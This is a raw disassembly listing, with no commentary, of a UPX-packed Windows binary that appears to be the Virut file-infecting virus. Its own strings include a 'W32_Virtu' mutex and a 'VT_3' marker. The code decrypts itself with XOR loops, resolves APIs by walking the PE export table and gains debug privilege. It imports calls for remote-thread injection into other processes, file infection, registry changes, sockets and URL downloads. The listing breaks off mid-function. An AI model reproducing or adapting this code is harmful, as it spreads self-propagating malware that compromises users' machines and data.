dd 1B2373B8h, 17234C42h, 0C3F1B19Bh, 3CAB25h, 1A202F42h
dd 8FA35AC9h, 44BF232Dh, 0D42B01E9h, 44378206h, 0EC667369h
dd 0DE46DBB9h, 6D672F66h, 6B632A9Ch, 2496C2FFh, 74690A63h
dd 614D2079h, 691A1E6Eh, 0B9158D76h, 206FF31h, 0A2CE8D24h
dd 4153527Ch, 0B3EFAC31h, 0FFFFFFF6h, 499F8EA4h, 0DB1F45DDh
dd 0E5B5C564h, 0CBE2AA0Dh, 63992223h, 18481C63h, 9AC3F273h
dd 0FFFFFC8Ch, 4D8556FFh, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 0FFF4E3EFh, 479E1BFFh
dd 84DFBDD8h, 80371EBAh, 0F58B8173h, 0E07D4A0Dh, 0C52DFE92h
dd 6FFFFFFFh, 0E020C6AAh, 68BD9C85h, 0B6296A50h, 0C3348250h
dd 8117F42h, 0B7B21C98h, 899D9CE7h, 0FFFFFFFFh, 971A3D77h
dd 5029A4D3h, 3A96A58Dh, 0E8FC8D46h, 10EB1612h, 457044AFh
dd 966AD0F8h, 439FB178h, 0FFFFF56Fh, 0A827EB51h, 8A397086h
dd 0C214DE09h
dd 7A53C1A1h, 85C4BF16h, 29E70F90h, 0D1BC4BFFh, 898E9E98h
dd 714FE53h, 0A3ECCA94h, 1DA11E75h, 0FFFFFFF8h, 0C5B4E8F9h
dd 0DB1A4ECBh, 3969D7F0h, 948C1A87h, 1318C67Bh, 0BF3EB382h
dd 67E0424Bh, 0FFFFFEEBh, 0B737A217h, 0D8B3AA60h, 48022D7h
dd 4BA67A65h, 855886FFh, 0F96EF645h, 7C956EEh, 800DFFD3h
dd 0A63B4A32h, 0D3D87AB7h, 233263EBh, 0FBA5CD34h, 31505FF0h
dd 31BC03D8h, 0D96888A4h, 48D34D34h, 0E8041C2Ch, 9A69A65Eh
dd 0A4BCCC66h, 0A1748094h, 64709A69h, 2E9F7150h, 85D3B46Dh
dd 5754BB6h, 392E6CDCh, 92161600h, 0D64B72Dh, 67AD6BC5h
dd 0CB5B6C6Dh, 866E511Ch, 5E722C75h, 2F80F856h, 79627A6Fh
dd 726241D9h, 386DB612h, 0C79A414h, 35A35879h, 4A38D6B0h
dd 9DB6BA67h, 6178EB63h, 7578732Eh, 16466E27h, 4223472Eh
dd 0A0673D1Bh, 1A5D2FCAh, 6C2836C0h, 701A671Ch, 82E78D6Fh
dd 7A2E11BDh, 33091361h, 61C737FEh, 5F1361B3h, 7543676Fh
dd 0D33AE6Bh, 0D85E7720h, 7E541F74h, 6364DEC8h, 6F6C1FA5h
dd 0B5612D73h, 58F5ACADh, 0E320972Eh, 0D95B5D75h, 166C9BD6h
dd 0B92FBE62h, 9EF60466h, 6C667292h, 85330E61h, 67FF2536h
dd 2E7A6172h, 876D7461h, 0C0573536h, 0CA2D77C0h, 0ED751ED5h
dd 0CB3EDDBFh, 66216362h, 6B6ABF67h, 6F6E6D6Ch, 0FF527170h
dd 7485F52Fh, 79787792h, 4241E97Ah, 46454443h, 4A494847h
dd 6D2C504Bh, 51FC4E2Ch, 0C0A95440h, 582FBDABh, 0B81B5A59h
dd 81107790h, 20387AD6h, 5707B62Ah, 0A074AB7Bh, 0CACBEF8Ch
dd 13204B43h, 625B27Bh, 0B531650h, 0A474E4Fh, 374AFD2Eh
dd 3407490Bh, 4F4A9235h, 0D61F9240h, 55512F0Ch, 0B1DB5449h
dd 561AB5B7h, 1166477Bh, 79B57423h, 72FB8165h, 75F8417h
dd 70342E92h, 0E32820E0h, 3B6462F3h, 6B561820h, 454934DFh
dd 9153620h, 83762F1Eh, 3035A405h, 776B0029h, 0B80B735Ah
dd 2C610371h, 0DB5C4D02h, 7E75D34h, 7C03690Fh, 13312D65h
dd 84094514h, 0D37FCBD7h, 4009C45Dh, 74736C01h, 706D6372h
dd 4A2B4741h, 7465FFF7h, 61636F4Ch, 6E49656Ch, 530F6F66h
dd 0AD8A5B62h, 63194438h, 0AC15798Fh, 57A29741h, 34466569h
dd 23DCCB30h, 6954AE45h, 760B0E6Dh, 54DECD06h, 15206Fh
dd 7B1E4146h, 0D0CB2D0h, 646F4D3Fh, 215F96C9h, 614E2DBCh
dd 37A8E41h, 4169D80Bh, 0FF1F7E5Eh, 0DF0577BDh, 706F4309h
dd 69933879h, 6578456Eh, 720F7683h, 6F7E8151h, 50669A6Ch
dd 33707FFBh, 616E5332h, 6F687370h, 0D6D31974h, 12D6EEA0h
dd 0F737232h, 7D35C654h, 2CB982C0h, 654E2118h, 573B7478h
dd 7068837Ch, 0B06E4972h, 5CC3656Bh, 0A64B6D1h, 6A7F6163h
dd 0DC1E5B62h, 150C7645h, 53A14661h, 35BDCD88h, 624F910Ah
dd 4414AF6Ah, 509B3CB0h, 4CCD2BF5h, 0D8764561h, 2650AD66h
dd 656E165Dh, 97C24B06h, 6E7065ECh, 9B774711h, 25CFF628h
dd 64410B12h, 830F7264h, 2D1BE12Dh, 7262694Ch, 4D2B9261h
dd 686708DCh, 789E289Eh, 44964865h, 0A8274687h, 166CC2D4h
dd 701D7510h, 2D9744ABh, 7550DEB4h, 44EC4DD8h, 78E8B849h
dd 0DCD5141h, 0D923308Bh, 6201226Ah, 30879587h, 3178450Ch
dd 0C9785D52h, 82D0570h, 9C657A22h, 4886F66Ch, 0EA2F0Fh
dd 6EECDAD1h, 79227842h, 0A9277470h, 1582FB6Ch, 440A10C4h
dd 300E6112h, 0FCD0776Ch, 53796669h, 0A1BCA67h, 4C3357B1h
dd 6F4E7916h, 0BEC1879h, 4B112C7Bh, 52107965h, 66D17876h
dd 3E651E9Ch, 0D87114EFh, 63413F90h, 72697571h, 759B494Dh
dd 538FA16Fh, 67CE3A74h, 19430D92h, 41B69B62h, 93E0410h
dd 0FB0ED6Bh, 11350A51h, 0EC0466Ch, 2117301Ch, 598458EEh
dd 415FAC10h, 44686962h, 53F519E1h, 0DDBF8268h, 11D0B34Eh
dd 78F8DE13h, 72FD696Fh, 6105F977h, 469736Eh, 5F736F63h
dd 705F4845h, 0ADBBD2A6h, 0B6744DCh, 7878435Fh, 1F604C6Ch
dd 6BDE098Eh, 85076859h, 70E4DAE6h, 0E22A4279h, 0CEC73572h
dd 685FDD6Eh, 73293328h, 0DB0C7274h, 0D11CE66h, 366D4906h
dd 7316DB36h, 74AC0FB1h, 13CE994h, 6DADC669h, 8B7C7377h
dd 5496674h, 0A08668A4h, 7F3A3965h, 5A1586CDh, 210BE514h
dd 98CC20EDh, 49F6200Bh, 0E2B84F64h, 50F49A74h, 16C0B76Fh
dd 55353DB6h, 0E114173h, 465B0DC1h, 0BB5D115Bh, 0A992E8B1h
dd 53AB7D6Eh, 0D6CB6574h, 64527555h, 80212CAh, 0B2CB2C73h
dd 10D022Ch, 2CB26F39h, 340BB2CBh, 80090C17h, 4CB2CB2h
dd 9161013h, 5733D528h, 0B72F4550h, 7C83FDB3h, 40D3167Eh
dd 10F00E0h, 0C06010Bh, 0E02F7334h, 0B131259h, 3530E51Dh
dd 1B180125h, 6B020B31h, 9BA4B733h, 1E700C07h, 364B1C34h
dd 60710B0h, 2E3B4803h, 8CB15840h, 4EFB648Fh, 1B0D857h
dd 26042E1Eh, 0C1189033h, 0C43406C0h, 9DB906C0h, 2EE0043Eh
dd 0BDFB9064h, 0DC01211h, 3827E90Bh, 6000C038h, 1B6C3000h
dd 2C033D43h, 96h, 0
dd 0FF24h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31506000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31508412
; ---------------------------------------------------------------------------
align 8
loc_31508408: ; CODE XREF: UPX1:loc_31508419�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3150840E: ; CODE XREF: UPX1:315084A6�j
; UPX1:315084BD�j
add ebx, ebx
jnz short loc_31508419
loc_31508412: ; CODE XREF: UPX1:31508400�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508419: ; CODE XREF: UPX1:31508410�j
jb short loc_31508408
mov eax, 1
loc_31508420: ; CODE XREF: UPX1:3150842F�j
; UPX1:3150843A�j
add ebx, ebx
jnz short loc_3150842B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150842B: ; CODE XREF: UPX1:31508422�j
adc eax, eax
add ebx, ebx
jnb short loc_31508420
jnz short loc_3150843C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31508420
loc_3150843C: ; CODE XREF: UPX1:31508431�j
xor ecx, ecx
sub eax, 3
jb short loc_31508450
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_315084C2
mov ebp, eax
loc_31508450: ; CODE XREF: UPX1:31508441�j
add ebx, ebx
jnz short loc_3150845B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150845B: ; CODE XREF: UPX1:31508452�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31508468
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508468: ; CODE XREF: UPX1:3150845F�j
adc ecx, ecx
jnz short loc_3150848C
inc ecx
loc_3150846D: ; CODE XREF: UPX1:3150847C�j
; UPX1:31508487�j
add ebx, ebx
jnz short loc_31508478
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508478: ; CODE XREF: UPX1:3150846F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3150846D
jnz short loc_31508489
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3150846D
loc_31508489: ; CODE XREF: UPX1:3150847E�j
add ecx, 2
loc_3150848C: ; CODE XREF: UPX1:3150846A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_315084AC
loc_3150849D: ; CODE XREF: UPX1:315084A4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_3150849D
jmp loc_3150840E
; ---------------------------------------------------------------------------
align 4
loc_315084AC: ; CODE XREF: UPX1:3150849B�j
; UPX1:315084B9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_315084AC
add edi, ecx
jmp loc_3150840E
; ---------------------------------------------------------------------------
loc_315084C2: ; CODE XREF: UPX1:3150844C�j
pop esi
mov edi, esi
mov ecx, 0C8h
loc_315084CA: ; CODE XREF: UPX1:315084D1�j
; UPX1:315084D6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_315084CF: ; CODE XREF: UPX1:315084F4�j
cmp al, 1
ja short loc_315084CA
cmp byte ptr [edi], 1
jnz short loc_315084CA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_315084CF
lea edi, [esi+6000h]
loc_315084FC: ; CODE XREF: UPX1:3150851E�j
mov eax, [edi]
or eax, eax
jz short loc_31508547
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31508519: ; CODE XREF: UPX1:3150853F�j
mov al, [edi]
inc edi
or al, al
jz short loc_315084FC
mov ecx, edi
jns short near ptr loc_3150852A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3150852A: ; CODE XREF: UPX1:31508522�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31508541
mov [ebx], eax
add ebx, 4
jmp short loc_31508519
; ---------------------------------------------------------------------------
loc_31508541: ; CODE XREF: UPX1:31508538�j
call dword ptr [esi+8094h]
loc_31508547: ; CODE XREF: UPX1:31508500�j
popa
jmp loc_31501D0B
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C48D44h, 0
dd 77D4C96Ah, 0
dd 7620AFB6h, 0
dd 71AB1A6Dh, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 60000387h, 83F00000h, 0
dd 26003150h
db 2 dup(0), 28h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_31509295
call sub_315092CE
mov ebp, fs:0
add ebp, 8
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31509295 proc near ; CODE XREF: start+3�p
call sub_315092CB
add edi, 41h
mov ebx, 243Ch
mov ecx, 8Fh
push edi
loc_315092AB: ; CODE XREF: sub_31509295+24�j
mov al, [edi]
xor ax, cx
mov [edi], al
inc edi
inc ecx
sub ebx, 1
or ebx, ebx
jnz short loc_315092AB
pop edi
mov esp, fs:0
pop dword ptr fs:0
leave
jmp edi
sub_31509295 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_315092CB proc near ; CODE XREF: sub_31509295�p
pop edi
push edi
retn
sub_315092CB endp
; =============== S U B R O U T I N E =======================================
sub_315092CE proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
xor eax, eax
pop dword ptr [ecx+0B8h]
retn
sub_315092CE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_31509327
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_3150931E
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_31509326
; ---------------------------------------------------------------------------
loc_3150931E: ; CODE XREF: UPX2:3150930F�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_31509326: ; CODE XREF: UPX2:3150931C�j
pop ebx
loc_31509327: ; CODE XREF: UPX2:315092F8�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 0E1h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_3150934E: ; CODE XREF: UPX2:3150936A�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_31509364
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_3150936C
loc_31509364: ; CODE XREF: UPX2:31509355�j
sub ebx, 100h
jnz short loc_3150934E
loc_3150936C: ; CODE XREF: UPX2:31509362�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_3150937A: ; CODE XREF: UPX2:loc_315093A1�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_315093A1
cmp dword ptr [eax+3], 636F7250h
jnz short loc_315093A1
cmp dword ptr [eax+7], 72646441h
jnz short loc_315093A1
cmp dword ptr [eax+0Bh], 737365h
jz short loc_315093A6
loc_315093A1: ; CODE XREF: UPX2:31509384�j
; UPX2:3150938D�j ...
loop loc_3150937A
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_315093A6: ; CODE XREF: UPX2:3150939F�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_315093CC+2
inc ebx
insb
outsd
jnb short near ptr loc_3150942A+2
dec eax
popa
outsb
db 64h
insb
loc_315093CC: ; CODE XREF: UPX2:315093BD�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_315093E8+1
inc ebx
jb short near ptr loc_31509443+1
popa
jz short near ptr loc_31509443+4
inc ebp
jbe short near ptr loc_31509449+1
outsb
jz short near ptr loc_31509427+2
loc_315093E8: ; CODE XREF: UPX2:315093D7�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_31509404
inc edi
db 65h
jz short near ptr loc_31509443+4
popa
jnb short loc_31509472
inc ebp
jb short near ptr loc_31509472+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_31509404 proc near ; CODE XREF: UPX2:315093F2�p
; FUNCTION CHUNK AT 315094AD SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 315095ED SIZE 0000013A BYTES
push ebx
call esi ; rand
mov [ebp+403544h], eax
call sub_31509482
test eax, eax
jz short loc_31509437
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_31509431
lea eax, [ebp+4011D2h]
loc_31509427: ; CODE XREF: UPX2:315093E6�j
mov dl, [eax-1]
loc_3150942A: ; CODE XREF: UPX2:315093C5�j
call sub_3150949D
jmp short loc_315094AD
; ---------------------------------------------------------------------------
loc_31509431: ; CODE XREF: sub_31509404+1B�j
; sub_31509404+136�j ...
call dword ptr [ebp+40353Ch]
loc_31509437: ; CODE XREF: sub_31509404+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31509461
loc_31509443: ; CODE XREF: UPX2:315093DD�j
; UPX2:315093E0�j ...
lea esi, [ebp+403435h]
loc_31509449: ; CODE XREF: UPX2:315093E3�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_31509461: ; CODE XREF: sub_31509404+3D�j
pop ebp
retn
sub_31509404 endp
; ---------------------------------------------------------------------------
loc_31509463: ; CODE XREF: sub_31509482+2�p
; sub_31509404:loc_3150966C�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_31509472: ; CODE XREF: UPX2:315093FC�j
; UPX2:315093FF�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
align 2
; =============== S U B R O U T I N E =======================================
sub_31509482 proc near ; CODE XREF: sub_31509404+9�p
xor ecx, ecx
call loc_31509463
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_31509482 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3150949D proc near ; CODE XREF: sub_31509404:loc_3150942A�p
; sub_3150B271+25B�p
mov dh, dl
mov ecx, 225Fh
loc_315094A4: ; CODE XREF: sub_3150949D+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_315094A4
retn
sub_3150949D endp
; ---------------------------------------------------------------------------
db 0B0h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31509404
loc_315094AD: ; CODE XREF: sub_31509404+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_315094D4: ; CODE XREF: sub_31509404+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_315094D4
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_31509867
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_315095ED
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_31509431
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_31509404
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_31509431
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_31509431
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_315095DD
jmp loc_31509431
; =============== S U B R O U T I N E =======================================
sub_315095DD proc near ; CODE XREF: UPX2:315095D3�p
; sub_315095DD+D�j
push 1
pop ecx
jecxz short locret_315095EC
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_315095DD
; ---------------------------------------------------------------------------
locret_315095EC: ; CODE XREF: sub_315095DD+3�j
retn
sub_315095DD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31509404
loc_315095ED: ; CODE XREF: sub_31509404+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_31509431
call near ptr loc_31509604+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_31509604: ; CODE XREF: sub_31509404+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_31509621+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_31509867
loc_31509621: ; CODE XREF: sub_31509404+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_31509431
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_3150966C
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_3150966C: ; CODE XREF: sub_31509404+25D�j
call loc_31509463
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_315096B1: ; CODE XREF: sub_31509404+2B0�j
lodsb
stosw
loop loc_315096B1
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_31509431
lea esi, [ebp+401000h]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_31509404
; ---------------------------------------------------------------------------
db 8Dh
db 95h ; •
db 0E0h, 18h, 40h
db 0
db 52h, 0FFh, 95h
db 9Ch ; œ
db 35h, 40h, 0
db 0E8h ; è
db 16h, 2 dup(0)
db 0
aLookupprivil_0 db 'LookupPrivilegeValueA',0
db 50h
dd 354895FFh, 85890040h, 40354Ch, 206A5450h, 95FFFF6Ah
dd 4035ECh, 755FC085h, 26A963Fh, 0D48B5656h, 0E852016Ah
dd 11h, 65446553h, 50677562h, 69766972h, 6567656Ch, 95FF5600h
dd 40354Ch, 5656C48Bh, 57565056h, 35D095FFh, 0C4830040h
dd 95FF5710h, 40353Ch, 26A006Ah, 357095FFh, 28B90040h
dd 97000001h, 0C89E12Bh, 0FF575424h, 4035AC95h, 83F63300h
dd 40363CA5h, 57540000h, 35B095FFh, 0C0850040h, 83465C74h
dd 0EE7204FEh, 82474FFh, 2A6A006Ah, 35A895FFh, 0C0850040h
dd 0E893DC74h, 43Dh, 0E391C933h, 3C853930h, 75004036h
dd 0AEC18128h, 5000000Dh, 51565054h, 0FF535050h, 40356895h
dd 59C08500h, 74FF0F74h, 858F0824h, 40363Ch, 0FFFDACE8h
dd 95FF53FFh, 40353Ch, 0C48198EBh, 128h, 3C95FF57h, 0E9004035h
dd 0FFFFFBE5h, 5800498Dh, 0CE005858h, 65000029h, 0Dh, 2 dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_31509867 proc near ; CODE XREF: sub_31509404+100�p
; sub_31509404+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_31509872: ; CODE XREF: sub_31509867+E�j
lodsb
test al, al
jnz short loc_31509872
loop sub_31509867
retn
sub_31509867 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_31509C02 proc near ; CODE XREF: UPX2:31509CA9�p
; UPX2:31509CBA�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
